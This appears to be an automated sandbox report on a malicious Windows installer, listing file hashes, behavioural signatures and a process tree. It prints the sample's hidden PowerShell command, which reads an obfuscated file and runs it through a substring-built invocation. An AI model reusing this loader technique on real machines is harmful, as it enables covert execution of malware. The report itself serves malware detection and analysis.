Overview
overview
8Static
static
334c4a0ba13...ca.exe
windows7-x64
834c4a0ba13...ca.exe
windows10-2004-x64
8$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Morgendagen.ps1
windows7-x64
8Morgendagen.ps1
windows10-2004-x64
8Precompiled/kloen.app
macos-10.15-amd64
1byggetilla...es.exe
windows7-x64
byggetilla...es.exe
windows10-2004-x64
Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
09/05/2024, 01:22
Static task
static1
Behavioral task
behavioral1
Sample
34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240215-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
Morgendagen.ps1
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
Morgendagen.ps1
Resource
win10v2004-20240426-en
Behavioral task
behavioral7
Sample
Precompiled/kloen.app
Resource
macos-20240410-en
Behavioral task
behavioral8
Sample
byggetilladelse/skiagraphical/Antieducational/concorrezanes/Partisanvirksomhedernes.exe
Resource
win7-20231129-en
Behavioral task
behavioral9
Sample
byggetilladelse/skiagraphical/Antieducational/concorrezanes/Partisanvirksomhedernes.exe
Resource
win10v2004-20240226-en
General
-
Target
34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe
-
Size
715KB
-
MD5
8bf77ce63ca8a74cdb6f68e500a3c55c
-
SHA1
acc29eb131fa05fc17cda4dd59f408f8549c2050
-
SHA256
34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca
-
SHA512
ef80bde286fe5c929745dff318a41abbe62fefeab88644ee306dfb8a47aed96b7f5a9d7da7e5b49cf50c01240c00655461367e9f48b5fea1359cbed82ebc7ce9
-
SSDEEP
12288:CEto9B/yhu8eO1rj6FDexWeo9jUlo5i2j3Em88w1MHzNrK1T6Rdoh5OQ38GN:CXoEGZj6Frl9v5i2YmW1eWjOe8GN
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1444 powershell.exe 1372 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 2776 34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe 2776 34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1444 powershell.exe 1372 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2776 wrote to memory of 1444 2776 34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe 28 PID 2776 wrote to memory of 1444 2776 34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe 28 PID 2776 wrote to memory of 1444 2776 34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe 28 PID 2776 wrote to memory of 1444 2776 34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe 28 PID 2776 wrote to memory of 1372 2776 34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe 30 PID 2776 wrote to memory of 1372 2776 34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe 30 PID 2776 wrote to memory of 1372 2776 34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe 30 PID 2776 wrote to memory of 1372 2776 34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe"C:\Users\Admin\AppData\Local\Temp\34c4a0ba138c27572a6c7ef1af7dbdbcface5dcbe246f857e41516b8269b7fca.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Retroclavicular=Get-Content 'C:\Users\Admin\AppData\Local\opbrusendes\traadormes\Retsvirkningslovs117\Morgendagen.geo';$Skillingsvisernes=$Retroclavicular.SubString(58311,3);.$Skillingsvisernes($Retroclavicular)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Retroclavicular=Get-Content 'C:\Users\Admin\AppData\Local\opbrusendes\traadormes\Retsvirkningslovs117\Morgendagen.geo';$Skillingsvisernes=$Retroclavicular.SubString(58311,3);.$Skillingsvisernes($Retroclavicular)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5874dda0177e566ab8753fdab048b5c41
SHA137515b6e6771dcbe4b01e6d2546aa341ca2b61cc
SHA2568f52c6fe0a21f34a629ab296068a85f2ee19adf1941d203845a2ecafc5208447
SHA5129f54aee4f4e01633586cec11cbde4572ef25cf7458a912be7d017750d50805cb013114ae1a029b3fd129ec1691809ffb1afc7649440ffe44cd042050dfdcc953
-
Filesize
6KB
MD5b5a1f9dc73e2944a388a61411bdd8c70
SHA1dc9b20df3f3810c2e81a0c54dea385704ba8bef7
SHA256288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884
SHA512b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8